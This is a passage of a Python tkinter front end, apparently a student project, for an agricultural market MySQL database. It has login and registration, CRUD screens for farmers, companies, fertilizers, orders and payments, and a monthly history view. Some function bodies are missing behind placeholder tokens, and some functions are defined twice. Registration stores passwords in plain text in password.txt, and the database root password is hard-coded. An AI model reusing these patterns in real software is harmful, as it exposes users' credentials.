    """Display one order record (id taken from e1) as labelled text lines."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM orders WHERE or_id=%s;'
        val = [e1.get()]
        cur.execute(sql, val)
        Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)
        Button.place(x=300, y=400)
        for val in cur:
            count = 0
            Y = 50
            names = ['order Id: ', 'Order date: ', 'Order fid: ',
                'Order formula: ', 'order to: ']
            for i in val:
                label = Label(root, text=names[count] + str(i), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=Y)
                Y += 50
                count += 1
        db.commit()
    except:
        l = Label(root, text='Invalid order id', font=('times new roman', 15))
        l.place(x=100, y=300)
        search_ord()
def payment():
    """Payment page: Back/Insert/Delete/Update/Search buttons plus the table view."""
    global root
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Payment Table', font=('Times new roman', 15),
        bg='white')
    label.place(x=350, y=10)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=
        entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text='Insert', font=('Arial', 15), command=
        insert_pay)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text='Delete', font=('Arial', 15), command=
        delete_pay)
    Button.place(x=210, y=50)
    Button = tk.Button(root, text='Update', font=('Arial', 15), command=
        update_pay)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_pay)
    Button.place(x=410, y=50)
    view_pay()
def view_pay():
    """Populate a scrollable Treeview with every row of the payment table."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
        'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
        yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('trans_id', text='Transaction Id')
    table.heading('p_f_id', text='Farmer Id')
    table.heading('p_date', text='Payment Date')
    table.heading('p_amount', text='Amount')
    table.heading('p_method', text='Payment Method')
    table['show'] = 'headings'
    table.pack()
    cur.execute('SELECT * FROM payment;')
    data = cur.fetchall()
    db.commit()
    if len(data) != 0:
        for row in data:
            table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_pay():
    """Render the payment insert form: transaction id (e1), farmer id (e2),
    date (e3, pre-filled with now), amount (e4) and a payment-method
    drop-down bound to e5; Commit calls insert_pay_command.
    """
    global e1, e2, e3, e4, e5, e6
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Transaction Id', font=('Times new roman', 20),
        bg='white')
    label.place(x=50, y=10)
    label = Label(root, text='Transaction farmer id', font=(
        'Times new roman', 20), bg='white')
    label.place(x=50, y=60)
    label = Label(root, text='Transaction date', font=('Times new roman',
        20), bg='white')
    label.place(x=50, y=110)
    label = Label(root, text='Transaction amount', font=('Times new roman',
        20), bg='white')
    label.place(x=50, y=160)
    label = Label(root, text='Transaction method', font=('Times new roman',
        20), bg='white')
    label.place(x=50, y=210)
    e1 = Entry(root, width=50)
    e2 = Entry(root, width=50)
    e3 = Entry(root, width=50)
    e4 = Entry(root, width=50)
    e1.place(x=350, y=10)
    e2.place(x=350, y=60)
    e3.place(x=350, y=110)
    e3.insert(0, datetime.now())
    e4.place(x=350, y=160)
    # e5 is a StringVar (read with .get() like the entries); the dead Entry
    # that was previously created for e5 and immediately overwritten is gone.
    e5 = StringVar(root)
    e5.set('Debit card')
    # BUG FIX: 'Debit card' is the default yet was missing from the menu, so
    # once changed it could never be re-selected.
    w = OptionMenu(root, e5, 'Debit card', 'Credit Card', 'UPI', 'Cheque',
        'Cash')
    w.place(x=350, y=210)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        insert_pay_command)
    Button.place(x=400, y=400)
def insert_pay_command():
    """Insert a payment row from e1..e5; re-open the form on failure."""
    try:
        sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        cur.executemany(sql, [vals])
        db.commit()
        payment()
    except:
        insert_pay()
def delete_pay():
    """Prompt for a transaction id to delete; Commit calls delete_pay_command."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Transaction Id:', font=('Times new roman', 20
        ), bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Commit', font=('Arial', 15), command=
        delete_pay_command)
    Button.place(x=400, y=400)
<|reserved_special_token_0|>
def search_pay():
    """Prompt for a transaction id; Search shows the record via search_pa()."""
    global e1
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    label = Label(root, text='Transaction Id:', font=('Times new roman', 20
        ), bg='tomato')
    label.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text='Search', font=('Arial', 15), command=
        search_pa)
    Button.place(x=400, y=400)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def First_page(root):
    """Render the login screen (username/password entries, LogIn and Register buttons) on *root*."""
    # NOTE(review): this is a duplicate definition of First_page; being later
    # in the file, it shadows the earlier one at import time.
    global T1, T2, T3
    frame = Frame(root, height=500, width=800, bg='ivory')
    frame.pack()
    label = Label(root, text='WELCOME TO AGRI MARKET', font=(
        'Times new roman', 25))
    label.place(x=200, y=50)
    button = Button(root, text='LogIn', font=('times new roman', 20),
        command=check_pass, bg='green')
    button.place(x=350, y=350)
    L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
    L1.place(x=150, y=200)
    T1 = tk.Entry(root, width=30, bd=5)
    T1.place(x=280, y=200)
    L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
    L2.place(x=150, y=250)
    T2 = tk.Entry(root, width=30, show='*', bd=5)
    T2.place(x=280, y=250)
    reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=
        'blue', command=create_pass)
    reg_button.place(x=340, y=400)
<|reserved_special_token_0|>
def create_pass():
    """Render the registration form (username, password, confirm password) over the login screen."""
    # NOTE(review): duplicate definition of create_pass; this later one wins.
    global root, T1, T2, T3
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'ivory')
    label.place(x=0, y=0)
    L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
    L1.place(x=150, y=200)
    T1 = tk.Entry(root, width=30, bd=5)
    T1.place(x=380, y=200)
    L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
    L2.place(x=150, y=250)
    T2 = tk.Entry(root, width=30, show='*', bd=5)
    T2.place(x=380, y=250)
    L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),
        bg='ivory')
    L2.place(x=150, y=300)
    T3 = tk.Entry(root, width=30, show='*', bd=5)
    T3.place(x=380, y=300)
    reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=
        'blue', command=add_pass)
    reg_button.place(x=440, y=400)
def add_pass():
    """Register a new user.

    Verifies the two password fields match, appends 'username=password' to
    password.txt, and continues to the entity page.
    NOTE(review): credentials are stored in plain text — consider hashing.
    """
    global root, T1, T2, T3
    if T2.get() != T3.get():
        label = Label(root, text='Incorrect Password. Enter again', font=(
            'times new roman', 20))
        label.place(x=100, y=100)
    else:
        try:
            with open('password.txt', 'r') as f:
                data = f.read()
            with open('password.txt', 'w') as f:
                f.write(data + '\n')
                f.write(T1.get() + '=' + T2.get())
        except OSError:
            # First registration: the file does not exist yet, so create it.
            # (Narrowed from a bare `except:` that hid unrelated errors.)
            with open('password.txt', 'w') as f:
                f.write(T1.get() + '=' + T2.get())
        entity_page()
def entity_page():
    """Main menu: one button per entity screen plus the booking history."""
    global root
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='ivory')
    blanket.place(x=0, y=0)
    banner = Label(root, text='WELCOME TO AGRI MARKET ', font=(
        'Times new roman', 20), bg='blue')
    banner.place(x=200, y=20)
    prompt = Label(root, text='Choose the Entity ', font=('Times new roman',
        20), bg='white')
    prompt.place(x=250, y=100)
    menu = [('Farmers', farmer, 100, 175), ('Company', company, 300, 175),
        ('Fertilizer', fertilizer, 500, 175), ('Order', orders, 200, 325),
        ('Payment', payment, 400, 325),
        ('GET BOOKING HISTORY', history, 200, 425)]
    for caption, callback, px, py in menu:
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=px, y=py)
def history():
    """Show this month's payment transactions via the getMonth stored procedure."""
    global root, cur, db
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    # The stored procedure expects the current month number as text ('01'..'12').
    cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])
    data = cur.fetchall()
    label = Label(root, text='The Transaction History of this month', font=
        ('Arial', 15))
    label.place(x=200, y=20)
    button = Button(root, text='BACK', command=entity_page)
    button.place(x=20, y=20)
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',
        'p_amount', 'p_method'), xscrollcommand=x_scroll.set,
        yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('trans_id', text='Transaction Id')
    table.heading('p_f_id', text='Farmer Id')
    table.heading('p_date', text='Payment Date')
    table.heading('p_amount', text='Amount')
    table.heading('p_method', text='Payment Method')
    table['show'] = 'headings'
    table.pack()
    for row in data:
        table.insert('', END, values=row)
    # Bug fix: the original called db.close() here, which permanently closed
    # the shared connection — the module-level reconnect runs only once at
    # import time, so every query after the first history() view failed.
# Module-level MySQL connection and cursor, shared by every screen through
# the globals `db` and `cur`.
# NOTE(review): credentials are hard-coded in plain text — move them to a
# config file or environment variables before shipping.
db = mysql.connector.connect(host='localhost', user='root', passwd=
    'bhushi', database='farmer_app')
cur = db.cursor()
<|reserved_special_token_0|>
def view_farmer():
    """Populate a Treeview with every row of the farmer table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    hbar = Scrollbar(container, orient=HORIZONTAL)
    vbar = Scrollbar(container, orient=VERTICAL)
    headings = {'f_id': 'Farmer Id', 'f_name': 'Farmer Name', 'f_phone':
        'Farmer Phone', 'f_mail': 'Farmer Mail', 'f_locality':
        'Farmer Locality', 'f_address': 'Farmer Address'}
    tree = ttk.Treeview(container, columns=tuple(headings),
        xscrollcommand=hbar.set, yscrollcommand=vbar.set)
    hbar.pack(side=BOTTOM, fill=X)
    vbar.pack(side=RIGHT, fill=Y)
    hbar.config(command=tree.xview)
    vbar.config(command=tree.yview)
    for column, caption in headings.items():
        tree.heading(column, text=caption)
    tree['show'] = 'headings'
    tree.column('f_id', width=100)
    tree.pack()
    cur.execute('SELECT * FROM farmer;')
    rows = cur.fetchall()
    db.commit()
    for record in rows:
        tree.insert('', END, values=record)
<|reserved_special_token_0|>
def insert_farmer():
    """Blank form for adding a farmer; Commit runs insert_farmer_command."""
    global e1, e2, e3, e4, e5, e6
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    captions = ['Farmer_id', 'Farmer_name', 'Farmer_phone', 'Farmer_mail',
        'Farmer_locality', 'Farmer_address']
    row_ys = [10, 60, 110, 160, 210, 270]
    for caption, y in zip(captions, row_ys):
        lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
        lbl.place(x=50, y=y)
    e1, e2, e3, e4, e5, e6 = (Entry(root, width=50) for _ in range(6))
    for entry, y in zip((e1, e2, e3, e4, e5, e6), row_ys):
        entry.place(x=350, y=y)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
        command=insert_farmer_command)
    commit_btn.place(x=400, y=400)
<|reserved_special_token_0|>
def invalid(page):
    """Show an 'enter valid id' screen for the given entity ('farmer' or
    'company') with a Re-enter button back to its insert form."""
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    targets = {'farmer': ('Enter valid farmer_id', insert_farmer),
        'company': ('Enter valid company_id', insert_company)}
    if page in targets:
        message, retry = targets[page]
        lbl = Label(root, text=message, font=('Times new roman', 30), bg='white')
        lbl.place(x=170, y=200)
        btn = Button(root, text='Re-enter', font=('Times new roman', 20),
            command=retry)
        btn.place(x=300, y=400)
<|reserved_special_token_0|>
def delete_farmer_command():
    """Delete the farmer whose id is typed in e1; show an error label on failure."""
    try:
        sql = 'DELETE FROM farmer WHERE f_id=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        farmer()
    except Exception:
        # Narrowed from a bare `except:` (which also swallowed KeyboardInterrupt).
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
def update_farmer():
    """Prompt for the farmer id to edit; OK loads the row via update()."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Farmer Id:', font=('Times new roman', 20),
        bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=update)
    ok_btn.place(x=300, y=400)
<|reserved_special_token_0|>
def update_command():
    """Persist the edited farmer fields (e2..e6) for the farmer id in e1.

    On any failure the user is sent back to re-enter the farmer id.
    """
    try:
        sql = (
            'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'
            )
        vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()
        # execute, not executemany: there is exactly one parameter row.
        cur.execute(sql, vals)
        db.commit()
        farmer()
    except Exception:
        # Narrowed from a bare `except:`.
        update_farmer()
def search_farmer():
    """Prompt for a farmer id; Search runs search(), Back returns to the farmer screen."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Farmer Id:', font=('Times new roman', 20),
        bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search)
    search_btn.place(x=400, y=400)
def search():
    """Look up the farmer id typed in e1 and display each column as a label."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM farmer WHERE f_id=%s;'
        cur.execute(sql, [e1.get()])
        ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)
        ok_btn.place(x=300, y=400)
        names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',
            'farmer mail: ', 'farmer locality: ', 'farmer address: ']
        for val in cur:
            # One label per column, stacked 50px apart starting at y=50.
            for offset, (caption, field) in enumerate(zip(names, val)):
                label = Label(root, text=caption + str(field), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=50 + 50 * offset)
        db.commit()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))
        l.place(x=100, y=300)
        search_farmer()
def company():
    """Company screen: toolbar (Back/Insert/Delete/Update/Search) plus the table view."""
    global root
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    heading = Label(root, text='Company Table', font=('Times new roman', 15),
        bg='white')
    heading.place(x=350, y=10)
    actions = [('Back', entity_page), ('Insert', insert_company), ('Delete',
        delete_company), ('Update', update_company), ('Search', search_company)]
    for slot, (caption, callback) in enumerate(actions):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * slot, y=50)
    view_company()
def view_company():
    """Populate a Treeview with every row of the company table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    hbar = Scrollbar(container, orient=HORIZONTAL)
    vbar = Scrollbar(container, orient=VERTICAL)
    headings = {'c_id': 'Company Id', 'c_name': 'Company Name', 'c_address':
        'Company Address'}
    tree = ttk.Treeview(container, columns=tuple(headings),
        xscrollcommand=hbar.set, yscrollcommand=vbar.set)
    hbar.pack(side=BOTTOM, fill=X)
    vbar.pack(side=RIGHT, fill=Y)
    hbar.config(command=tree.xview)
    vbar.config(command=tree.yview)
    for column, caption in headings.items():
        tree.heading(column, text=caption)
    tree['show'] = 'headings'
    tree.column('c_id', width=100)
    tree.pack()
    cur.execute('SELECT * FROM company;')
    rows = cur.fetchall()
    db.commit()
    for record in rows:
        tree.insert('', END, values=record)
def insert_company():
    """Blank form for adding a company; Commit runs insert_company_command."""
    global e1, e2, e3, e4, e5, e6
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    captions = ['Company_id', 'Company_name', 'Company_address']
    row_ys = [10, 110, 210]
    for caption, y in zip(captions, row_ys):
        lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
        lbl.place(x=50, y=y)
    e1, e2, e3 = (Entry(root, width=50) for _ in range(3))
    for entry, y in zip((e1, e2, e3), row_ys):
        entry.place(x=350, y=y)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
        command=insert_company_command)
    commit_btn.place(x=400, y=400)
def insert_company_command():
    """Validate and insert the company form; re-show the form on any failure."""
    try:
        if len(e1.get()) > 3:
            # Company ids are limited to 3 characters.
            invalid('company')
        else:
            sql = 'INSERT INTO company values(%s,%s,%s);'
            vals = e1.get(), e2.get(), e3.get()
            # execute, not executemany: a single parameter row.
            cur.execute(sql, vals)
            db.commit()
            company()
    except Exception:
        # Narrowed from a bare `except:`.
        insert_company()
def delete_company():
    """Prompt for a company id to delete; Commit runs delete_company_command."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Company Id:', font=('Times new roman', 20),
        bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
        command=delete_company_command)
    commit_btn.place(x=400, y=400)
def delete_company_command():
    """Delete the company whose numeric id is typed in e1.

    int() also rejects non-numeric input, which lands in the error branch.
    """
    try:
        sql = 'DELETE FROM company WHERE c_id=%s;'
        cur.execute(sql, [int(e1.get())])
        db.commit()
        company()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_c():
    """Load the company row matching the id typed in e1 into editable fields
    so it can be modified via update_command_c."""
    try:
        global e1, e2, e3, e4, e5, e6
        label = Label(root, text=' ' * 800, font=('Times new roman', 500),
            bg='tomato')
        label.place(x=0, y=0)
        sql = 'SELECT * FROM company WHERE c_id=%s;'
        cur.execute(sql, [e1.get()])
        captions = ['Company_id', 'Company_name', 'Company_address']
        row_ys = [10, 110, 210]
        for caption, y in zip(captions, row_ys):
            lbl = Label(root, text=caption, font=('Times new roman', 20),
                bg='white')
            lbl.place(x=50, y=y)
        e1, e2, e3 = (Entry(root) for _ in range(3))
        entries = [e1, e2, e3]
        # Pre-fill the entries with the current row; IndexError on no match
        # lands in the error branch below.
        data = cur.fetchall()
        for entry, value in zip(entries, data[0]):
            entry.insert(0, value)
        for entry, y in zip(entries, row_ys):
            entry.place(x=350, y=y)
        modify_btn = Button(root, text='Modify', font=('Times new roman', 20),
            bg='blue', command=update_command_c)
        modify_btn.place(x=300, y=400)
    except Exception:
        # Narrowed from a bare `except:`; message fixed — it previously said
        # 'Invalid Farmer_id' on the company screen.
        l = Label(root, text='Invalid Company_id', font=('times new roman', 15))
        l.place(x=100, y=300)
        update_company()
<|reserved_special_token_0|>
def search_company():
    """Prompt for a company id; Search runs search_c, Back returns to the company screen."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Company Id:', font=('Times new roman', 20),
        bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search_c)
    search_btn.place(x=400, y=400)
def search_c():
    """Look up the company id typed in e1 and display each column as a label."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM company WHERE c_id=%s;'
        cur.execute(sql, [e1.get()])
        ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=company)
        ok_btn.place(x=300, y=400)
        names = ['company id: ', 'company name: ', 'company address: ']
        for val in cur:
            for offset, (caption, field) in enumerate(zip(names, val)):
                label = Label(root, text=caption + str(field), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=50 + 50 * offset)
        db.commit()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Company Id', font=('times new roman', 15))
        l.place(x=100, y=300)
        search_company()
def fertilizer():
    """Fertilizer screen: toolbar (Back/Insert/Delete/Update/Search) plus the table view."""
    global root
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    heading = Label(root, text='Fertilizer Table', font=('Times new roman',
        15), bg='white')
    heading.place(x=350, y=10)
    actions = [('Back', entity_page), ('Insert', insert_fer), ('Delete',
        delete_fer), ('Update', update_fer), ('Search', search_fer)]
    for slot, (caption, callback) in enumerate(actions):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * slot, y=50)
    view_fer()
def view_fer():
    """Populate a Treeview with every row of the fertilizer table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    hbar = Scrollbar(container, orient=HORIZONTAL)
    vbar = Scrollbar(container, orient=VERTICAL)
    headings = {'fe_formula': 'Fertilizer Formula', 'fe_name':
        'Fertilizer name', 'fe_content': 'Fertilizer content', 'fe_price':
        'Fertilizer price', 'company_id': 'Company_id'}
    tree = ttk.Treeview(container, columns=tuple(headings),
        xscrollcommand=hbar.set, yscrollcommand=vbar.set)
    hbar.pack(side=BOTTOM, fill=X)
    vbar.pack(side=RIGHT, fill=Y)
    hbar.config(command=tree.xview)
    vbar.config(command=tree.yview)
    for column, caption in headings.items():
        tree.heading(column, text=caption)
    tree['show'] = 'headings'
    tree.pack()
    cur.execute('SELECT * FROM fertilizer;')
    rows = cur.fetchall()
    db.commit()
    for record in rows:
        tree.insert('', END, values=record)
<|reserved_special_token_0|>
def insert_fer_command():
    """Insert the fertilizer form values; re-show the form on any failure."""
    try:
        sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        # execute, not executemany: a single parameter row.
        cur.execute(sql, vals)
        db.commit()
        fertilizer()
    except Exception:
        # Narrowed from a bare `except:`.
        insert_fer()
def delete_fer():
    """Prompt for a fertilizer formula to delete; Commit runs delete_fer_command."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Fertilizer formula:', font=('Times new roman',
        20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=fertilizer)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
        command=delete_fer_command)
    commit_btn.place(x=400, y=400)
def delete_fer_command():
    """Delete the fertilizer whose formula is typed in e1; show an error on failure."""
    try:
        sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        fertilizer()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
def update_fer():
    """Prompt for the fertilizer formula to edit; OK loads the row via update_fe."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Fertlizer formula:', font=('Times new roman',
        20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)
    ok_btn.place(x=300, y=400)
def update_fe():
    """Load the fertilizer row matching the formula typed in e1 into editable
    fields so it can be modified via update_command_fe."""
    try:
        global e1, e2, e3, e4, e5, e6
        label = Label(root, text=' ' * 800, font=('Times new roman', 500),
            bg='tomato')
        label.place(x=0, y=0)
        sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
        cur.execute(sql, [e1.get()])
        captions = ['Fertlizer formula', 'Fertlizer name',
            'Fertlizer content', 'Fertlizer price', 'comapny_id']
        row_ys = [10, 60, 110, 160, 210]
        for caption, y in zip(captions, row_ys):
            lbl = Label(root, text=caption, font=('Times new roman', 20),
                bg='white')
            lbl.place(x=50, y=y)
        e1, e2, e3, e4, e5 = (Entry(root) for _ in range(5))
        # Bug fix: the original built `[e1, ..., e5, e6]` with the stale
        # global e6, risking a NameError that the bare except then hid.
        entries = [e1, e2, e3, e4, e5]
        data = cur.fetchall()
        for entry, value in zip(entries, data[0]):
            entry.insert(0, value)
        for entry, y in zip(entries, row_ys):
            entry.place(x=350, y=y)
        modify_btn = Button(root, text='Modify', font=('Times new roman', 20),
            bg='blue', command=update_command_fe)
        modify_btn.place(x=300, y=400)
    except Exception:
        # Narrowed from a bare `except:`; message fixed — it previously said
        # 'Invalid Farmer_id' on the fertilizer screen.
        l = Label(root, text='Invalid Fertilizer formula', font=(
            'times new roman', 15))
        l.place(x=100, y=300)
        update_fer()
<|reserved_special_token_0|>
def search_fer():
    """Prompt for a fertilizer formula; Search runs search_fe, Back returns to the fertilizer screen."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Fertlizer formula:', font=('Times new roman',
        20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=fertilizer)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search_fe)
    search_btn.place(x=400, y=400)
def search_fe():
    """Look up the fertilizer formula typed in e1 and display each column as a label."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'
        cur.execute(sql, [e1.get()])
        ok_btn = tk.Button(root, text='OK', font=('Arial', 15),
            command=fertilizer)
        ok_btn.place(x=300, y=400)
        names = ['fertilizer formula: ', 'fertilizer name: ',
            'fertilizer content: ', 'fertilizer price: ', 'company_id: ']
        for val in cur:
            for offset, (caption, field) in enumerate(zip(names, val)):
                label = Label(root, text=caption + str(field), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=50 + 50 * offset)
        db.commit()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Fertilizer formula', font=(
            'times new roman', 15))
        l.place(x=100, y=300)
        search_fer()
def orders():
    """Orders screen: toolbar (Back/Insert/Delete/Update/Search) plus the table view."""
    global root
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    heading = Label(root, text='Orders Table', font=('Times new roman', 15),
        bg='white')
    heading.place(x=350, y=10)
    actions = [('Back', entity_page), ('Insert', insert_ord), ('Delete',
        delete_ord), ('Update', update_ord), ('Search', search_ord)]
    for slot, (caption, callback) in enumerate(actions):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * slot, y=50)
    view_ord()
def view_ord():
